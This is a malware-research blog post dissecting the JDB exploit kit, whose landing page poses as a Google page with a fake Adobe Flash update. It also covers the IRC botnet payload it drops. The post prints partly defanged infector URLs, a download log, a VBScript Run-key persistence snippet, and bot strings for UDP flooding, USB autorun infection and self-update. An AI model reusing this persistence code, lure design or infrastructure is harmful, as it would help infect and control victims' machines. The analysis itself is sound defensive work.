Thursday, January 31, 2013

Peeking at Anon JDB Exploit Kit infector (212.7.192.100/jdb/inf.php?id=xxx) with AV verdicted called "DarkKomet", but actually a NayraBOT/AryaNBot an IRC Backdoor USB Worm

Background

There are good investigations that make you feel good after decoding everything up, and there are also some incompleted ones, like this story. Which is really annoying me in the end, but I decided to release it anyway, for sharing information purpose. Why this wasn't good? Actually is not *that* bad, I got the exploit kit script figured well, but missing the JAR exploit infector file thus somehow the payload (definitely malicious) won't infect my PC eventhough I tried it in many ways. So there were a LOT of things to do & time to consume to make this post.. [NEW!] - With the help of other researchers we fully figured the payload w/details -->>[HERE] [NEW!] - The JAR details of this exploit kit is written in the next post -->>[HERE] These are the set of JDB infection at our first attempt: It all started from infected sites with IFRAME contains "jdb/inf・php?id=" strings. Found it UP AND ALIVE in many online sites in internet now, i.e.: Several Facebook's posts like: Developer Forum's posts like: An injected code in blog sites like: Also found it as injected code in gamer sites: Or some code pasted in Paste posts like: Shortly, I searched about 23 sites contains this infected code before I call it a day, if you want to confirm this injections please check it by google for "jdb/inf・php?id=" strings.(Thank's to @Hulk_Crusader for finding the infector tips in internet) These injected url leads to the same infector site at the below url:
212,7.192.100/jdb/inf.php?id=xxx
If we check into URLquery will show the below result: (Thank's for @MalwareSigs for the url hint which was perfectly matched to the case!) Discussing this matter with our team-mate @Hulk_Crusader, we found out these are the infection of JDB Exploit Kit. Honestly, we really have no idea what this is all about except some reference in the internet, so after seeing Hulk's rage is increased (see below).. .. I decided to investigate this further. Here we go:

Landing Page

Every Exploit Pack has different works, so does this one. And this one has its unique ways. I accessed the two below confirmed infectors from URLQuery: (thanks Hulk!)
212,7.192.100/jdb/inf,php?id=0e60198f77a4c5f78f2d8fb8fa7e5776
212,7.192.100/jdb/inf,php?id=454897430d071f42dc980fcfe917c75a
And they worked in different way, even the request was sent by a simple defined static conditions: "With Java and without Java" While accessing the 1st url, with or without Java I received below script response: And I have response of landing page script if accessing the 2nd URL "with Java": ↑This is how we got in touch with the landing page of JDB Exploit Kit. So how is it goes if we got infected? I tried to infect my self by using the landing page, and it goes like this: I tried to connect to one of URL above & having a pop up asking for Adobe Flash update: In the Java console I found the access for java classes which was executed as per logged below: You maybe have different response depends on your browser, but If we use the latest IE + Java in the browser the response might look like pic below: Back to the code, in either the 1st or 2nd accessed URL above this javascript was executed: If we press the OK button the malware file is starting to be downloaded. Let's make sure that the url is still valid...
--2013-01-30 15:45:05--  
h00p://212,7.192.100/jdb/lib/adobe.php?id=454897430d071f42dc980fcfe917c75a
seconds 0.00, Connecting to 212,7.192.100:80... seconds 0.00, connected.
  :
GET /jdb/lib/adobe.php?id=454897430d071f42dc980fcfe917c75a HTTP/1.0
Referer: (Put the URL of infected site here..)
User-Agent: MalwareMustDie rocks JDB now!
Host: "212,7.192.100"
HTTP request sent, awaiting response...
   :
HTTP/1.1 200 OK
Date: "Wed, 30 Jan 2013 06:45:52 GMT"
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.20
Content-Disposition: inline; filename="Adobe-Flash_WIN.exe"
Connection: close
Content-Type: application/octet-stream
  :
200 OK
Length: "unspecified [application/octet-stream]"
Saving to: "Adobe-Flash_WIN.exe"
2013-01-30 15:45:08 (99.0 KB/s) - "Adobe-Flash_WIN.exe" saved [83968]
And this is the actual file looks like: ↑What was popped up as Adobe Updater looks like "Image Extractor" now :-) The point of this section is both Java or not Java supported browser is being targeted by JDB exploit kit. Let's move on. We'll go back to this payload analysis later.. Now let's see the detail code in the landing page. JDB uses the PluginDetect-base java script, a well-customized one. I hardly recognize the base if I didn't look at it very well. In a glimpse you'll probably will think that you are seeing Google page source code.. I'll explain to you why. We can see the PluginDetect typical code traces like below:
"The usage of the alphabetical values of PluginDetect.."
// You'll se this very much scattered in codes..
 (function () {
     var b, c, d, e;
     function g(a, f) {...
       :

"The way of PluginDtect Define the DOM/XML Component of IE:"

(function () {
    var a, b = "1";
    if (document && document.getElementById) if ("undefined" != typeof XMLHttpRequest) b = "2";
    else if ("undefined" != typeof ActiveXObject) {
        var c, d, e = ["MSXML2.XMLHTTP.6.0", "MSXML2.XMLHTTP.3.0", "MSXML2.XMLHTTP", "Microsoft.XMLHTTP"];
        for (c = 0; d = e[c++];) try {
            new ActiveXObject(d), b = "2"
        } catch (f)...

(etc..etc..)
JDB EK scattered the infector script between CSS & HTML like the below structure, PS: as per mentioned, it required Java installed for folowing this scheme..
"Infector script came up first..."
<script ..
setTimeout("alert('Adobe Flash must be updated to view this, please install the latest version!'...;
setTimeout("location.href = ...

"Continued by the java applet..."
<applet width='0px' height='0px' 
    code="GAME,class" archive="data・php?id=xxxx....
"
"HTML starts, following by a redirector script code of faking Google page.."
<html itemscope="itemscope" itemtype="http://schema.org/WebPage">
<head>
    <meta itemprop="image" content="/images/google_favicon_128.png">
    <title>Google</title>
    <script>
      (function () {
       window.google = {
       kEI: "xcrhUNW6MpHBswbloYHoBA",
       getEI: function (a) {
           for (var b; a && (!a.getAttribute || !(b = a.getAttribute("eid")));) a = a.parentNode;
            return b || google.kEI

"Some obfuscation detected here.."
 kEXPI: "17259,39523,39976,4000116,4000473,4000566,4000955,4001..."
 kCSI: {
     e: "17259,39523,39976,4000116,4000473,4000566,4000955,4001..."
     ei: "xcrhUNW6MpHBswbloYHoBA"
              :
"..Following by PluginDetct customized.. with all stuffs -
was related/linked with the Google...
no wonder many automation got fooled by this
and think it was google redirection page.."

<script> (
 function () {
    try {
      var e = !0,
          h = null,
          j = !1;
      var aa = function (a, b, c, d) {
          d = d || {};
          d._sn = ["cfg", b, c].join(".");
          window.gbar.logger.ml(a, d)
      };
      var m = window.gbar = window.gbar || {}, 
        p = window.gbar.i = window.gbar.i || {}, ba;
       :
The full "neutralized" landing script is-->>[HERE] Please see the code in the pastebin well, and you'll see many Google API & calls used. Conclusion is, you should be aware of which are the real Google page & which are not if you meet this kind of exploit kit. What looks like Google maybe is not real Google. PS: This "faking" scheme actually can be implemented in many portals or SNS sites too.. So let&s be aware of this trend. Below is the snapshot of fake Google page generated by this landing page: In additional,I studied other case which were reported in URLquery here -->>[URLquery] too. ↑In that case user were redirected perfectly to the Google portal (http://www.google.no/), with also generated javascript eval() obfuscated hex values (pls expand the bottom parts) I tried to decode it in some ways it's meaningful.. and still not making any sense..

JAR Infector

It has the JAR infector as per above landing page mentioned "class.class" or "GAME.class" , which are referred to the download url as per mentioned applet tag mentioned above, (at the beginning of the landing page script) Nd it pointed to the part below:
GAME.class' archive='data.php?id=0e60198f77a4c5f78f2d8fb8fa7e5776
Note: Due to some technicalities in fetching this file, I will add the JAR analysis later.. The file is there. But always returning 0 byte, as per logged below:
HTTP/1.1 200 OK
Date: Wed, 30 Jan 2013 13:39:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.20
Content-Disposition: inline; filename=0e60198f77a4c5f78f2d8fb8fa7e5776.jar
"Content-Length: 0  <========="
Connection: close
Content-Type: application/octet-stream
  :
200 OK
Length: 0 [application/octet-stream]
The JAR adventure of this Anon JDB EK is longer than I thought, so it will write it in the next post, stay tune! [NEW] The JAR & its payload report is here-->>[HERE]

Payload

OK, we got one payload in this first attempt. And in our next post you can see much more payloads dropped from the JARs file, let's continue w/this payload: Looks like already uploaded into internet 5(five)hours ago, AV products are detecting this as a DarkKomet trojan, a backdoor downloader. Below is Virus Total Scan Details:
SHA1:      e5d2da5b3546f24e1510f8ae53e0d05ce342c806
MD5:       10c8559523f8f5787daa3dc8e47b64e1
File size: 82.0 KB ( 83968 bytes )
File name: Adobe-Flash_WIN.exe
File type: Win32 EXE
Tags:      peexe
Detection: 15 / 46
Analysis date: 2013-01-30 06:42:34 UTC ( 5 hours, 40 minutes ago )
URL: https://www.virustotal.com/latest-scan/90359af6d9dafee904552f17318cee1c26d7bd68db30fae362b69c4693d57aa1

"Malware name:"
F-Secure                 : Gen:Variant.Zusy.33769
DrWeb                    : BackDoor.HostBooter.3
GData                    : Gen:Variant.Zusy.33769
AhnLab-V3                : Backdoor/Win32.DarkKomet
ESET-NOD32               : a variant of MSIL/Injector.AZM
VBA32                    : TScope.Trojan.MSIL.gen
TrendMicro-HouseCall     : TROJ_GEN.F4AHZAM
Avast                    : Win32:Malware-gen
BitDefender              : Gen:Variant.Zusy.33769
Agnitum                  : Trojan.Scarsi!W0yI8SvDe54
Malwarebytes             : Trojan.Downloader.ED
Ikarus                   : Backdoor.Win32.DarkKomet
Fortinet                 : MSIL/Dropper.CSS!tr
AVG                      : Dropper.Generic7.ATKY
Panda                    : Trj/Dtcontx.A
OK, AV signature Said DarkKomet, so let's take a look closer... Remember you should see yourself it to understand what it really is. The binary looks like this:
Compilation timedatestamp: 2013-01-18 21:26:40
Compiled by: Microsoft Visual Basic .NET
Target machine: 0x14C (Intel 386)
Entry Point at:  0x64ee
Virtual Address is 0x4080ee
Sections:
   .text 0x2000 0x60f4 25088  // no packer detected
   .sdata 0xa000 0xb0 512
   .rsrc 0xc000 0xdd00 56832
   .reloc 0x1a000 0xc 512
"HEX snips.."
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   50 45 00 00 4C 01 04 00 10 BE F9 50 00 00 00 00    PE..L......P....
0090   00 00 00 00 E0 00 02 01 0B 01 0B 00 00 62 00 00    .............b..
00A0   00 E2 00 00 00 00 00 00 EE 80 00 00 00 20 00 00    ............. ..
00B0   00 A0 00 00 00 00 40 00 00 20 00 00 00 02 00 00    ......@.. ......
00C0   04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00    ................
00D0   00 C0 01 00 00 04 00 00 00 00 00 00 02 00 40 85    ..............@.
00E0   00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00    ................
00F0   00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00    ................
0100   A0 80 00 00 4B 00 00 00 00 C0 00 00 00 DD 00 00    ....K...........
Interesting findings in binary;
A compilation trace...
0x006634   C:\Users\USER\Documents\Mallette magique\stubs\
           Image Extract v1.3\Image Extract v1.3
           \obj\x86\Release\Image Extract v1.3.pdb
Looks it drops this file...
0x00509D   c:\MyTest.txt
The binary contains these "interesting" words :-)
0x0050C7   Blues           0x00561D   Folk/Rock         0x005369   Meditative           0x005871   Tango
0x0050D3   Classic Rock    0x005631   National Folk     0x00537F   Instrumental Pop     0x00587D   Samba
0x0050ED   Country         0x00564D   Swing             0x0053A1   Instrumental Rock    0x005889   Folklore
0x0050FD   Dance           0x005659   Bebob             0x0053C5   Ethnic               0x00589B   Ballad
0x005109   Disco           0x005665   Latin             0x0053D3   Gothic               0x0058A9   Power Ballad
0x00511F   Grunge          0x005671   Revival           0x0053E1   Darkwave             0x0058C3   Rhythmic Soul
0x00514B   Metal           0x005681   Celtic            0x005419   Electronic           0x0058DF   Freestyle
0x005157   New Age         0x00568F   Bluegrass         0x005443   Eurodance            0x0058FD   Punk Rock
0x005167   Oldies          0x0056A3   Avantgarde        0x005457   Dream                0x005911   Drum Solo
0x005175   Other           0x0056B9   Gothic Rock       0x005463   Southern Rock        0x005925   A Cappella
0x005199   Reggae          0x0056D1   Progressive Rock  0x00547F   Comedy               0x005955   Dance Hall
0x0051B1   Techno          0x0056F3   Psychedelic Rock  0x005497   Gangsta              0x005973   Drum & Bass
0x0051BF   Industrial      0x005715   Symphonic Rock    0x0054A7   Top 40               0x0059A5   Hardcore
0x0051D5   Alternative     0x005733   Slow Rock         0x0054B5   Christian Rap        0x0059B7   Terror
0x0051F5   Death Metal     0x005747   Big Band          0x0054D1   Pop/Funk             0x0059C5   Indie
0x00520D   Pranks          0x005759   Chorus            0x0054E3   Jungle               0x0059D1   BritPop
0x00521B   Soundtrack      0x005767   Easy Listening    0x0054F1   Native American      0x0059E1   Negerpunk
0x00524B   Ambient         0x005785   Acoustic          0x005511   Cabaret              0x0059F5   Polsk Punk
0x00526F   Vocal           0x005797   Humour            0x005521   New Wave             0x005A15   Christian Gangsta Rap
0x00527B   Jazz Funk       0x0057A5   Speech            0x005533   Psychadelic          0x005A41   Heavy Metal
0x00528F   Fusion          0x0057B3   Chanson           0x005555   Showtunes            0x005A59   Black Metal
0x00529D   Trance          0x0057C3   Opera             0x005569   Trailer              0x005A71   Crossover
0x0052AB   Classical       0x0057CF   Chamber Music     0x005589   Tribal               0x005A85   Contemporary Christian
0x0052BF   Instrumental    0x0057EB   Sonata            0x005597   Acid Punk            0x005AB3   Christian Rock
0x0052E3   House           0x0057F9   Symphony          0x0055AB   Acid Jazz            0x005AD1   Merengue
0x0052F9   Sound Clip      0x00580B   Booty Bass        0x0055BF   Polka                0x005AE3   Salsa
0x00530F   Gospel          0x005821   Primus            0x0055CB   Retro                0x005AEF   Thrash Metal
0x00531D   Noise           0x00582F   Porn Groove       0x0055D7   Musical              0x005B09   Anime
0x005329   AlternRock      0x005847   Satire            0x0055E7   Rock & Roll          0x005B1F   Synthpop
0x00535D   Space           0x005855   Slow Jam          0x0055FF   Hard Rock
If it is a DarkKomet trojan, it supposed opening backdoor & making calls to the mothership. So I wonder what exactly *this* DarKomet will do... Maybe if we lucky we can see the location of the mothership too. Well, I run this payload like below snapshot to see its malicious acts: As per expected, it dropped the txt file in root folder, so far so good.. But too bad,↑the file is containing zero byte.. I run and check it here and there, like: Well, it run. Yes. but no malicious act detected in my test :-( It runs, for say 10 seconds then exit 0. It doesn't actually opening any network socket for backdoor nor making internet connection.. Strange.. Only in the memory I saw a lot of suspicious calls like:
0x4DC446      http\shell\open\command
0x4DE1CE      http://
0x30E16E      WWW-AuthenticateHTTP/
0x2DA392      HTTP/1.1 200 OK
0x2D2A5A      HttpListenerContext#
0x2D2DDA      httpListener#
0x2D2E76      httpContext#
0x2D2F2E      HTTP Method:
0x383E72      HTTP_SEND_REQUEST_FLAG_MORE_DATA
0x383E96      HTTP_RECEIVE_REQUEST_FLAG_COPY_BODY
0x383EBA      HTTP_SEND_RESPONSE_FLAG_MORE_DATA
0x383EDE      HTTP_SEND_RESPONSE_FLAG_RAW_HEADER
↑So it supposed to start connecting internet but it doesn't.. no PCAP. At that time, the suspicious traces I found is at the memory dump, and some operation in IE cache in windows' registry.. it's really annoying. [NEW!] After a while I was contacted by our researcher friend: Matt of @undeadsecurity , which explained he got the PCAP. you can see Matt's post here -->>[Link] (thank's for the good work!--> @undeadsecurity) Matt's recorded below traffic: (the pic below belongs to Matt/@undeadsecurity) Which we can eliminate the broadcast address of 10.74.4.255 and also eliminate AKAMAI network from the list, what's left in the traffic (in PCAP)is the malware communication: ↑You see DNS query to adultsirc.no-ip.org + some connect tries to IRC 6667 port. At the time I saw this I was decided to drop the verdict of AV products which saying about Trojan DarkKomet etc etc (which you should too!). Still, I couldn't make it run it in my system so I took into Matt's report further, and it was mentioned this IMPORTANT trails:
on error resume next
test = "winmgmts:{impersonationLevel=impersonate}//./root/default:StdRegProv"
Set objRegistry=GetObject(test)
strKeyPath = "Software\Microsoft\Windows\CurrentVersion\Run"
strValueName = "jeQodSivaa"
strValue = """C:\Users\Admin\AppData\Roaming\pbYRmjBa3B\L4b1HYCWGL.exe"""
objRegistry.SetStringValue &H80000001,strKeyPath,strValueName,strValue
Since I didn't have more clue, ↑this is my base to start searching and asking more for references. A while ago I received a very good advise in kernel mode to strip .NET - onfuscator trails in the binary. (thank's to @Rinn of kernelmode). Previous words are actually the .NET obfuscator:
0x0050D3   Classic Rock    0x005631   National Folk     0x00537F   Instrumental Pop     0x00587D   Samba
0x0050ED   Country         0x00564D   Swing             0x0053A1   Instrumental Rock    0x005889   Folklore
0x0050FD   Dance           0x005659   Bebob             0x0053C5   Ethnic               0x00589B   Ballad
So all we do is remove it & assemble the binary then re-checking the insides one more time to find the below malicious operation clues: UDP Flooding/DoS attack operation (Saw Hulk's face is getting greener here...)
0x001600   Flooding: "%s:%d", Delay: "%d(ms)", For "%d" Seconds
0x0015E8   %d%d%d%d%d%d%d%d
0x001590   %s %s %s
0x001574   %s %s :[AryaN]: %s
0x00156C   %s %s
0x001558   %s "" "%s" :%s
0x0015A4   Finished Flooding "%s:%d"
0x0015C4   Terminated UDP Flood Thread
Bot Killer feature... (I don't have a heart to se Hulk's face at this point..)
0x000768   Botkiller
0x000774   Successfully Killed And Removed Malicious File: "%s"
0x000800   Usage: %s IP PORT DELAY LENGTH
0x000828   Failed To Start Thread: "%d"
0x00084C   Failed: Mis Parameter
Found the below URL:
0x000C84   h00p://api.wipmania.com/
Accesssing removable drives + infecting with autorun.inf w/autostart: (you really don't want to know what's Hulk did at this point..)
0x0017A4   LNK Infected Removable Device: "%s\", Created: "%d" Lnk Files
0x0019B4   AutoRun Infected Removable Device: "%s\"
  :
0x0014BC   Software\Microsoft\Windows\CurrentVersion\Run
0x001640   %temp%\deletethis.exe
0x001674   Removable_Drive.exe
0x0016BC   %s\{%s-%s}
0x0016D8   /k "%s" Open %s
0x001700   %windir%\System32\cmd.exe
0x001740   %s\Removable_Drive.exe
0x001778   %s\%s
0x001788   %s\%s.lnk
0x001990   %s\autorun.inf
Self-update feature...
0x000A18   Update Complete, Uninstalling
0x000A3C   Successfully Executed Process: "%s"
0x000A68   Failed To Create Process: "%s", Reason: "%d"
0x000AA0   Successfully Replaced AryaN File With Newly Download File, Update Will Take Affect On Next Reboot
0x000B48   Successfully Downloaded File To: "%s"
0x000B78   Downloading File: "%s"
0x000B94   Download
  :
0x000874   Failed: "%d"
0x000884   Visit
0x00088C   Failed: Mis Parameter, Usage: %s [SHOW/HIDE] [URL]
0x0008D4   Filed To Visit: "%s"
0x0008F0   Successfully Visited: "%s"
0x000920   %s #%s
0x00092C   %s %s
0x000940   Terminated WGet Thread
0x000964   Running From: "%s"
0x00097C   [%s][%s] - "%s"
0x000990   hh':'mm':'ss
0x0009E8   {%s}: %s
And some more, which lead us to the reliable references below: Threat Expert Uploaded Ref 7 November 2011, 15:16:47-->>[HERE] SonicWall Security Center ALERT 1 -->>[HERE] SonicWall Security Center ALERT 2 -->>[HERE]

Research Material

Here's the 1.5MB download for the dump (snapped double data on it)-->>[HERE] Be free to download the sample -->>[HERE] - if you are willing to examine it yourself. The download of PCAP I stripped from Matt's effort is-->>[HERE] The full text of the stripped .NET obfuscator binary in text -->>[HERE] That's it for today, the JAR used by this Exploit Kit is written in - the next post here --->>[HERE]
#MalwareMustDie!